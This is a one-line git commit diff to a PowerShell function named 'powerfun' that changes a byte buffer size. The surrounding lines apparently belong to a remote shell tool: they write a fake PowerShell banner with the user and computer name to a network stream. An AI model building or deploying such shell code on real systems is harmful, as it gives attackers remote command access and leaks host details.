Updated size

This commit is contained in:
benpturner 2015-05-19 14:08:59 +01:00
parent 811c45ab90
commit 0cda746bfb
1 changed files with 1 additions and 1 deletions

View File

@ -36,7 +36,7 @@ function powerfun
$stream = $sslStream
}
[byte[]]$bytes = 0..65555|%{0}
[byte[]]$bytes = 0..44444|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)